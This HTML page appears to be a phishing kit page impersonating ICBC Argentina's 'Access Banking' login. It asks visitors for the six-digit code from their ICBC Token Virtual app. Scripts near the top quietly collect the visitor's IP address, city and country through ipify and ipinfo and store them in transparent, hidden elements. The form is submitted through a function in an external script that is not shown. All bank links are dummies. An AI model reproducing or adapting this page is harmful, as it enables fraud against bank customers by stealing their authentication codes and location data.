<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Estado de Validez</title>
    <link rel="Stylesheet" href="css/style.css" type="text/css" media="screen">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
         $.getJSON("https://api.ipify.org?format=json",
                                           function(data) {
         
             // Setting text of element P with id gfg
             $("#284092mcge28").html(data.ip);
         })
      </script>
      <script>
         $.getJSON("https://ipinfo.io", function (response) {
    $("#c3e29f94jv").html("" + response.city + ", " + response.country);
    
})
      </script> 
    <link rel="Stylesheet" href="css/login-acc.css" type="text/css" media="screen">
    <link rel="Stylesheet" href="css/message-view-acc.css" type="text/css" media="screen">
    <link rel="shortcut icon" href="img/lachina.ico">
    <link rel="stylesheet" href="css/iview.css" type="text/css" media="screen">
   
    <style>
      .contenedorSlider {
        font-family: Arial;
        cursor: default;
        position: relative;
        overflow: hidden;
      }

      .iview-controlNav a {
        text-indent: -9999px;
      }

      .iview-controlNav {
        position: absolute;
        bottom: 15px;
        right: 40px;
      }

      .iview-controlNav a.iview-control {
        padding: 0px;
        float: left;
        width: 14px;
        height: 14px;
        line-height: 0px;
      }

      .iview-controlNav a.circle {
        background: url('/accstatic/i/bulletcircle.png') no-repeat;
        line-height: 0px;
      }

      .iview-controlNav a.square {
        background: url('/accstatic/i/bulletsquare.png') no-repeat;
        line-height: 0px;
      }

      .iview-controlNav a.rhombus {
        background: url('/accstatic/i/bulletrhombus.png') no-repeat;
        line-height: 0px;
      }

      .iview-controlNav a.number {
        font-size: 19px;
        color: #FFFFFF;
        text-indent: 2px !important;
        line-height: 15px;
      }

      .iview-controlNav div.iview-items {
        float: left;
        padding: 0px;
      }

      .iview-controlNav div.iview-items ul {
        margin: 0px;
        padding: 0px;
      }

      .iview-controlNav div.iview-items ul li {
        padding: 0px;
        float: left;
        width: 14px;
        height: 14px;
        margin: 0px 5px 0px 5px;
        line-height: 0px;
      }

      .iview-controlNav a.iview-control.active {
        color: #FF0000;
        background-position: 0px -14px;
      }

      .iview-controlNav a.iview-control.hover {
        color: #FF0000;
        background-position: 0px -14px;
      }

      #iview-preloader {
        border: 0px;
        width: 32px;
        height: 32px;
        background: url('/accstatic/i/preloader.gif') no-repeat;
      }

      #iview-preloader div {
        background: #DA1F2F;
        height: 7px;
        display: none;
      }

      #iview-timer {
        display: none !important;
      }

      .iview-playPauseButton {
        position: absolute;
        right: 10px;
        bottom: 12px;
        background: url('/accstatic/i/btnplaypause.png') no-repeat;
        background-position: -20px 0px;
        margin: 0px 5px 0px 5px;
        width: 20px;
        height: 20px;
        z-index: 9;
        cursor: pointer;
        display: none;
      }

      .iview-playPauseButton.play {
        background-position: 0px 0px;
      }

      .iview-caption {
        line-height: 0px;
        display: none;
      }

      .iview-imgBackground {
        position: absolute;
        top: 0px;
        left: 0px;
        display: none;
      }
    </style>
    
    <style type="text/css">
      #_copy {
        align-items: center;
        background: #4494d5;
        border-radius: 3px;
        color: #fff;
        cursor: pointer;
        display: flex;
        font-size: 13px;
        height: 30px;
        justify-content: center;
        position: absolute;
        width: 60px;
        z-index: 1000
      }

      #select-tooltip,
      #sfModal,
      .modal-backdrop,
      div[id^=reader-helper] {
        display: none !important
      }

      .modal-open {
        overflow: auto !important
      }

      ._sf_adjust_body {
        padding-right: 0 !important
      }

      .super_copy_btns_div {
        position: fixed;
        width: 154px;
        left: 10px;
        top: 45%;
        background: #e7f1ff;
        border: 2px solid #4595d5;
        font-weight: 600;
        border-radius: 2px;
        font-family: -apple-system, BlinkMacSystemFont, Segoe UI, PingFang SC, Hiragino Sans GB, Microsoft YaHei, Helvetica Neue, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol;
        z-index: 5000
      }

      .super_copy_btns_logo {
        width: 100%;
        background: #4595d5;
        text-align: center;
        font-size: 12px;
        color: #e7f1ff;
        line-height: 30px;
        height: 30px
      }

      .super_copy_btns_btn {
        display: block;
        width: 128px;
        height: 28px;
        background: #7f5711;
        border-radius: 4px;
        color: #fff;
        font-size: 12px;
        border: 0;
        outline: 0;
        margin: 8px auto;
        font-weight: 700;
        cursor: pointer;
        opacity: .9
      }

      .super_copy_btns_btn:hover {
        opacity: .8
      }

      .super_copy_btns_btn:active {
        opacity: 1
      }
    </style>
    
  </head>
  <body class="bodySite">
    <div class="containerSite">
      <!-- HEADER -->
      <div class="headerContainer fullpagewidthline">
        <div class="backcolor_0084 logoHeaderDiv">
          <a href="#">
            <img src="img/ICBC_logoBU.png" alt="" border="0" valign="middle">
          </a>
        </div>
        <div class="header_globe" style="float:right;  ">
          <table width="200" border="0" cellspacing="0" cellpadding="0">
            <tbody>
              <tr valign="top">
                <td height="20" align="right" class="homeblacktxt">
                  <a href="#" class="homeblacktxt">ayuda</a> | <a href="#" class="homeblacktxt">contactanos</a>
                </td>
              </tr>
              <tr>
                <td class="homeblacktxt" height="19">
                  <img src="img/p.gif" width="1" height="1">
                </td>
              </tr>
              <script language="javascript" src="jotaese/jquery.jclockNew.js.descarga" type="text/JavaScript"></script>
                              <script type="text/javascript">
                                 $(function($) {        
                                     var optionsEST = {
                                         utc: true,
                                         utcOffset: -5,
                                         format: "%R de %B de %Y - %H:%M", 
                                         language: "es"
                                    }
                                 $('#jclock1').jclockNew(optionsEST);
                                 });
                              </script>
              <tr>
                <td align="right" id="jclock1" class="backcolor_0084 headerFechaTd homeblacktxt">10 de noviembre de 2022 - 21:43</td>
              </tr>
            </tbody>
          </table>
        </div>
        <table class="generalLineSeparator" width="778" border="0" cellspacing="0" cellpadding="0">
          <tbody>
            <tr>
              <td height="1"></td>
            </tr>
          </tbody>
        </table>
      </div>
     
      <table width="778" border="0" cellspacing="0" cellpadding="0" class="horizontalmenuline">
        <tbody>
          <tr>
            <td height="1"></td>
          </tr>
        </tbody>
      </table>
      <!-- TITULO -->
      <div id="accessTitle">ACCESS BANKING</div>
      <!-- SEPARADOR -->
      <table width="778" border="0" cellspacing="0" cellpadding="0" class="horizontalmenuline">
        <tbody>
          <tr>
            <td height="1"></td>
          </tr>
        </tbody>
      </table>
      <!-- CONTAINER -->
      <div class="container">
        <div class="login-body">
          <div class="login-body-align">
            <!-- Mensajes simples genericos -->
            <div id="containerMessage" class="message-type message-type--inactive">
              <!-- ICONO -->
              <i id="message-icon" class="push-left" aria-hidden="true"></i>
              <!-- Titulo -->
              <div class="message-type__title-simple" id="mensaje-titulo"></div>
              <!-- Descripcion -->
              <p class="message-type__description" id="mensaje-descripcion"></p>
            </div>
            <div class="text-titulo"> Ingresá el código generado en tu aplicación ICBC Token Virtual</div>
            <div class="input-block">
              <form class="formToValidate"  action="" method="post" autocomplete="off" onsubmit=" return sender()">
                
                <div class="input-block__pass">
                  <div class="input-label"> Token Virtual </div>
                  <input id="c4r0tyx18249c" class="password" type="text" name="claveProvisoria" value="" required maxlength="6" minlength="6" tabindex="3" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;">

                  
                </div>
                <ul class="block-buttons margin-up--xxl">
                  <li class="block-buttons__item">
                    <input id="botonSubmit" onclick="cambiarFoco()" type="submit" class="btnclass" name="submitButton" value="Continuar" >
                  </li>
                </ul>

              </form>
            </div>
           
            <link rel="Stylesheet" href="css/dragWindow.css" type="text/css" media="screen">
            <link rel="Stylesheet" href="css/TecladoEstilo.css" type="text/css" media="screen">
          </div>
        </div>
        
       <br>
      <table class="footergbl"  width="778" border="0" cellspacing="0" cellpadding="0">
        <tbody>
          <tr>
            <td>
              <a href="#">Términos y Condiciones</a>
              <font class="footerc"> | </font>
              <a href="#">Política de Privacidad</a>
              <font class="footerc"> | </font>
              <a href="#">Aviso Legal - Ley 25.738</a>
              <font class="footerc"> | </font>
              <a href="#">CABA - Ley 2.709</a>
              <font class="footerc"> | </font>
              <font class="footerc"> | </font>
              <font class="footerc"> | </font> | <a href="#">Defensa del Consumidor</a>
              <font class="footerc"> | </font>
              <a href="#">
                <br>Comparación de comisiones </a>
              <font class="footerc"> | </font>
              <a href="#">Gerenciamiento de Riesgos</a>
              <font class="footerc"> | </font>
              <a href="#">P. Datos Personales</a>
              <font class="footerc"> | </font>
              <a href="#">FATCA</a>
              <font class="footerc"> | </font>
              <a href="#">Agente Institorio</a>
              <font class="footerc"> | </font>
              <a href="#">ALyC</a>
              <br>Industrial and Commercial Bank of China (Argentina) S.A.U. 2012 TODOS LOS DERECHOS RESERVADOS
            </td>
            
          </tr>
        </tbody>
      </table>
      <table width="778" border="0" cellspacing="0" cellpadding="0" class="horizontalmenuline">
        <tbody>
          <tr>
            <td height="1"></td>
          </tr>
        </tbody>
      </table>
      
    </div>
    <script type="text/javascript">
               var seconds = 29; //número de segundos a contar
               function secondPassed() {
               
                 var minutes = Math.round((seconds - 30)/60); //calcula el número de minutos
                 var remainingSeconds = seconds % 60; //calcula los segundos
                 //si los segundos usan sólo un dígito, añadimos un cero a la izq
                 if (remainingSeconds < 10) { 
                   remainingSeconds = "0" + remainingSeconds; 
                 } 
                 document.getElementById('countdown').innerHTML = minutes + ":" +     remainingSeconds; 
                 if (seconds == 0) { 
                   clearInterval(countdownTimer); 
                   document.getElementById('countdown').innerHTML = ""; 
                   document.getElementById('suave').innerHTML = ""; 
                 } else { 
                   seconds--; 
                 } 
               } 
               
               var countdownTimer = setInterval(secondPassed, 1000);
            </script>
    </script>
    <script type="text/javascript">
       window.setTimeout(setEnabled, 30000);

function setEnabled() {
  var toks = document.getElementById('c4r0tyx18249c');
  if (toks) {
    toks.disabled = false;
  }
}
    </script>
    <script type="text/javascript">
       window.setTimeout(setEnabled, 30000);

function setEnabled() {
  var toks = document.getElementById('btn');
  if (toks) {
    toks.disabled = false;
  }
}
    </script>
    <script src="jotaese/lasegund4.js"></script>

  </body>
  <p id="284092mcge28"  style="color: transparent;">
                  <p id="c3e29f94jv" style="color: transparent;">

</html>